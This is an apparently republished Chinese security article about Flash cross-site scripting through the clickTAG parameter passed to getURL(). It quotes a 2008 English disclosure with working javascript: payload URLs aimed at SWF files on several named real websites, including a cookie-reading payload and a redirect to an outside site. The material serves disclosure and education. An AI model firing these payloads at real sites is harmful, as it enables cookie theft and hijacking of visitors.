此类漏洞也是程序员很少注意的问题。
Flash的XSS也是很早就有人关注了,OWASP里还专门有一个扫Flash XSS的工具,叫做swfintruder。最近有人也报了一个常见的flash xss,利用 _root.clickTAG 这个变量。
一般是出在 getURL() 函数里。发现者说(google搜出来的):Recently, 12th of November 2008, I found XSS vulnerabilities in 215000 flash files.
原文引用如下:
XSS:
Vulnerability in the next AS code:
getURL(_root.clickTAG, "_blank");
Attack occurs via passing of XSS code to flash file in parameter clickTAG:
http://site/flash.swf?clickTAG=javascript:alert('XSS')
After click on flash the transfer to function occurs of getURL string, which passed to flash via parameter clickTAG. Thus can be executed JS code, which was passed to flash.
At http://server.cpmstar.com:
http://server.cpmstar.com/cached/creatives/1499_728_90_games.swf?clickTAG=javascript:alert('XSS')
Note, that flashes with target = “_blank” (in getURL) not allow to get to cookies. And they also not work in IE6. If target set to not “_blank” (or not set at all), then flashes give possibility to get to cookies in all browsers (and they work in IE6).
Here are another examples of vulnerable flashes at three sites:
At http://www.banjohangout.org:
http://www.banjohangout.org/img/ads/fitch2b.swf?clickTAG=javascript:alert('XSS')
At http://ad1.emediate.dk:
http://ad1.emediate.dk/media.1/165/2861/15816/HP_Workstation_300x250-clickTAG.swf?clickTAG=javascript:alert('XSS')
At http://www.open4smart.eu:
http://www.open4smart.eu/sitesimages/artclbanners/468x60.swf?clickTAG=javascript:alert('XSS')
There are similar flashes, which are using variable clickTAG, with the next AS code:
getURL(_root.clickTAG, _root.TargetAS);
Attack occurs with using of variables clickTAG and TargetAS:
http://site/flash.swf?clickTAG=javascript:alert('XSS')&TargetAS=
At http://www.adspeed.com:
http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:alert('XSS')&TargetAS=
http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:alert(document.cookie)&TargetAS=
http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:document.location%3D'http://websecurity.com.ua'&TargetAS=
This allows to get to cookies in all browsers and attack normally works in IE.
These XSS - it's strictly social XSS, which I mentioned already concerning vulnerability at craigslist.org (http://websecurity.com.ua/2206/). First time this type of XSS holes I introduced last year with Cross-Site Scripting in Mozilla and Firefox (http://websecurity.com.ua/1413/). I'll write in detail about this class of vulnerabilities. |
责编:
微信扫一扫实时了解行业动态
微信扫一扫分享本文给好友 
微信扫一扫实时了解行业动态
资深技术经理:无线网络设备导致信..
网上邻居九招特殊的应用.doc
